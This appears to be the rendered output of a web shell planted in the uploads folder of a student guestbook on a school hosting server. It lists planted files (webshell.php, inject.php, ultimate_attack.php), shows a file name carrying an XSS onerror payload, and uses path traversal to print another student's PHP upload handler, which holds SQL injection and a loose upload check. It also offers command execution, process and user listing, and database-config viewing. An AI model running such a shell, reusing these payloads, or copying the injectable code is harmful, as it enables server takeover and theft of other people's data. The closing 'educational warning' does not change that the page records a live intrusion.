🐚 WEB SHELL ACTIVATED

πŸ“ File Browser

Current directory: /home/klas4s23/domains/585455.klas4s23.mid-ica.nl/public_html/Gastenboek/uploads

πŸ“„ ' onerror='alert(`Gehacked door Jasper!`);window.location.replace(`..`)'.png [view]
πŸ“ ..
πŸ“„ 003b15869ae62d2ceeee451a5f652dd6.png [view]
πŸ“„ 0tk5j14v024b1.jpg [view]
πŸ“„ 300px-Cursed_Cat.jpg [view]
πŸ“„ 32640-afbeelding-1__ScaleMaxWidthWzYwMF0_CompressedW10.jpg [view]
πŸ“„ Bill-Gates-Paul-Allen-2013.jpg [view]
πŸ“„ CV Jasper Kramp.png [view]
πŸ“„ Cat profile.png [view]
πŸ“„ Fronalpstock_big.jpg [view]
πŸ“„ Krik en las.jpg [view]
πŸ“„ Krik.jpg [view]
πŸ“„ Pino-dood-03.jpg [view]
πŸ“„ Shellz.php [view]
πŸ“„ Ted_Kaczynski_2_(cropped).jpg [view]
πŸ“„ Tux.svg.png [view]
πŸ“„ Z.png [view]
πŸ“„ android.jpg [view]
πŸ“„ apple.php [view]
πŸ“„ cianancatfish.jpg [view]
πŸ“„ downloads (1).jpeg [view]
πŸ“„ downloads.jpeg [view]
πŸ“„ epresso.jpg [view]
πŸ“„ fake_photo.png [view]
πŸ“„ hand.jpg [view]
πŸ“„ https___dynaimage.cdn.cnn.com_cnn_x_156,y_210,w_1209,h_1612,c_crop_https2F2F5bae1c384db3d70020c01c40%2FfireflyWolfy.jpg [view]
πŸ“„ image.png [view]
πŸ“„ images.jpeg [view]
πŸ“„ info.php [view]
πŸ“„ inject.php [view]
πŸ“„ instant_redirect.jpg [view]
πŸ“„ japper.jpg [view]
πŸ“„ koekiemonster-3.jpg [view]
πŸ“„ logo.png [view]
πŸ“„ muis.jpg [view]
πŸ“„ people-call-woman-ugly-responds-with-more-selfies-melissa-blake-1-5d75f249a418b__700.jpg [view]
πŸ“„ picobellobv.jpeg [view]
πŸ“„ redirect.php [view]
πŸ“„ rupsje-nooitgenoeg-knuffel-pluche-42-cm-500x500.jpg [view]
πŸ“„ sdfsa.png [view]
πŸ“„ sneaky.svg [view]
πŸ“„ taylor.webp [view]
πŸ“„ test.html [view]
πŸ“„ testpreg.php [view]
πŸ“„ testpreg1.php [view]
πŸ“„ testtest.php.JPG [view]
πŸ“„ ultimate_attack.gif [view]
πŸ“„ ultimate_attack.php [view]
πŸ“„ ultimate_attack.svg [view]
πŸ“„ wallpaper.jpg [view]
πŸ“„ webshell.php [view]

πŸ“„ Viewing: ./../../../../586248.klas4s23.mid-ica.nl/public_html/l3-gastenboek-gijss033/add_message.php

<?php
// session_start();

// include 'dbconfig.php';

// if ($_SERVER['REQUEST_METHOD'] == "POST") {
//     // Controleer of de gebruiker al een bericht heeft achtergelaten in deze sessie
//     if (!isset($_SESSION['message_left'])) {
//         $leeftijd = $_POST['leeftijd'];
//         $naam = $_POST['naam'];
//         $bericht = $_POST['bericht'];

//         // Afbeelding uploaden
//         $target_directory = "uploads/";
//         $target_file = $target_directory . basename($_FILES["afbeelding"]["name"]);
//         move_uploaded_file($_FILES["afbeelding"]["tmp_name"], $target_file);

//         // Huidige datum en tijd
//         $current_date = date('Y-m-d H:i:s');

//         // SQL-query om gegevens toe te voegen aan de database
//         $sql = "INSERT INTO gebruikers (naam, leeftijd, bericht, afbeelding, datum) VALUES ('$naam', '$leeftijd', '$bericht', '$target_file', '$current_date')";

//         if ($conn->query($sql) === TRUE) {
//             echo "<p>Bedankt voor je bijdrage!</p>";
//             header('Location: index.html');
           
//             // Markeer dat de gebruiker al een bericht heeft achtergelaten in deze sessie
//             $_SESSION['message_left'] = true;
//             exit();

//         } else {
//             echo "Error: " . $sql . "<br>" . $conn->error;
//         }
//     } else {
//         echo '<p class="bericht">Je hebt al een bericht achtergelaten tijdens deze sessie.</p>';
//     }
    
// }

// $conn->close();

/////////

session_start();

include 'dbconfig.php';

// Tijd tussen berichten in seconden (hier ingesteld op 1 uur)
// define("timeBetweenMessages", 30);

// if ($_SERVER['REQUEST_METHOD'] == "POST") {
//     // Controleer of er al een array is voor berichten in deze sessie
//     if (!isset($_SESSION['messages'])) {
//         $_SESSION['messages'] = array(); // Maak een lege array aan als die er niet is
//     }

//     // Controleer of er al een uur is verstreken sinds het laatste bericht is verzonden
//     if(isset($_SESSION['lastMessageSent']) && (time() - $_SESSION['lastMessageSent'] < timeBetweenMessages)) {
//         echo "<script>";
//         echo "alert('You cant leave another message')";
//         echo "window.location.href = index.html"
//         echo "</script>";
//         // header("refresh:2;url=index.html");
//         exit(); // Stop met de uitvoering van verdere code
//     }

// Check if the form has been submitted
if ($_SERVER["REQUEST_METHOD"] == "POST") {
    // Check if enough time has passed since the last message was sent
    define("TIMESBETWEENMESSAGES",1800);
    if (isset($_SESSION['lastMessageSent'])) {
        if (time() - $_SESSION['lastMessageSent'] < TIMESBETWEENMESSAGES) {
            echo '<script>';
            echo "alert('Je kan maar 1 bericht per 30 min plaatsen')";
            header("refresh:0.1;url=index.html");
            echo '</script>';
            exit();
        }
    }

    // Controleer of het formulier is ingediend en er een bestand is geΓΌpload
    if (isset($_FILES['file']) && $_FILES['file']['error'] === UPLOAD_ERR_OK) {
        $fileTmpPath = $_FILES['file']['tmp_name'];
        $fileName = basename($_FILES['file']['name']); // kijk naar deze regel (waarom kan je hier wel de naam uit halen)
        echo 'dit is mijn filename ' . $fileName;
        $fileSize = $_FILES['file']['size'];
        $fileType = mime_content_type($fileTmpPath);
        $fileNameCmps = explode(".", $fileName);
        $fileExtension = strtolower(end($fileNameCmps));

        $allowedfileExtensions = array('jpg', 'jpeg', 'png');
        $allowedMimeTypes = array('image/jpeg', 'image/png');

        // Debug output
        echo "Bestandsextensie: $fileExtension<br>";
        echo "MIME-type: $fileType<br>";

        if (in_array($fileExtension, $allowedfileExtensions) && in_array($fileType, $allowedMimeTypes)) {
            $uploadFileDir = './uploads/';
            $dest_path = $uploadFileDir . $fileName;

            if (move_uploaded_file($fileTmpPath, $dest_path)) {
                // Afbeelding is succesvol geΓΌpload
                // echo 'gelukt';
            } else {
                echo 'Er was een probleem bij het uploaden van het bestand.';
                exit();
            }
        } else {
            echo 'Ongeldig bestandstype of MIME-type. Alleen JPG en PNG bestanden zijn toegestaan.';
            exit();
        }
    } else {
        echo 'Er was een fout bij het uploaden van het bestand.';
        exit();
    }

    $leeftijd = $_POST['leeftijd'];
    $naam = $_POST['naam'];
    $bericht = $_POST['bericht'];

    // Afbeelding uploaden
    $target_directory = "uploads/";
    $target_file = $target_directory . basename($_FILES["file"]["name"]); // waarom denk je dat deze leeg is?
    echo " hoi dit is mijn file: " . $target_directory;
    move_uploaded_file($_FILES["afbeelding"]["tmp_name"], $target_file);

    // Huidige datum en tijd
    $current_date = date('Y-m-d H:i:s');

    // Voeg het nieuwe bericht toe aan de sessie array
    $_SESSION['messages'][] = array(
        'naam' => $naam,
        'leeftijd' => $leeftijd,
        'bericht' => $bericht,
        'afbeelding' => $target_file,
        'datum' => $current_date
    );

    // SQL-query om gegevens toe te voegen aan de database
    $sql = "INSERT INTO gastenboek (naam, leeftijd, bericht, afbeelding, datum) VALUES ('$naam', '$leeftijd', '$bericht', '$target_file', '$current_date')";

    if ($conn->query($sql) === TRUE) {
        echo "<p>Bedankt voor je bijdrage!</p>";
        $_SESSION['lastMessageSent'] = time(); // Tijd van laatste bericht verzenden
        header('Location: http://586248.klas4s23.mid-ica.nl/l3-gastenboek-gijss033/index.html');
        exit();
    } else {
        echo "Error: " . $sql . "<br>" . $conn->error;
    }
} else {
    echo '<p class="bericht">Je hebt al een bericht achtergelaten tijdens deze sessie.</p>';
}

$conn->close();

?>

<?php
    // Hier kun je de berichten uit de database halen en weergeven
    include 'dbconfig.php';

    $sql = "SELECT * FROM gastenboek ORDER BY datum DESC";
    $result = $conn->query($sql);

    if ($result->num_rows > 0) {
        while($row = $result->fetch_assoc()) {
            echo "<div>";
            echo "<h3>" . htmlspecialchars($row['naam']) . " (" . htmlspecialchars($row['leeftijd']) . ")</h3>";
            echo "<p>" . htmlspecialchars($row['bericht']) . "</p>";
            if (!empty($row['afbeelding'])) {
                echo "<img src='" . htmlspecialchars($row['afbeelding']) . "' alt='Afbeelding' style='max-width: 200px;'><br>";
            }
            echo "<small>Datum: " . htmlspecialchars($row['datum']) . "</small>";
            echo "</div><hr>";
        }
    } else {
        echo "Geen berichten gevonden.";
    }

    $conn->close();
    ?>



<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
    <link rel="stylesheet" href="style.css">
</head>
<body>
<section class="container">
    <a href="http://localhost/l3-gastenboek-gijss033/index.html">
        <button class="pill" type="button">berichten</button>
    </a>
</section>
</body>
</html>

🎯 Available Actions

Command Execution:

Quick Commands:

πŸ“‹ List files | πŸ‘€ Show user | πŸ“ Show directory | πŸ”„ Show processes | πŸ” Show users

File Operations:

⬆️ Parent directory | 🏠 Root directory | πŸ” View DB config
⚠️ Educational Warning: This demonstrates a web shell vulnerability. In a real attack, this could allow complete server compromise!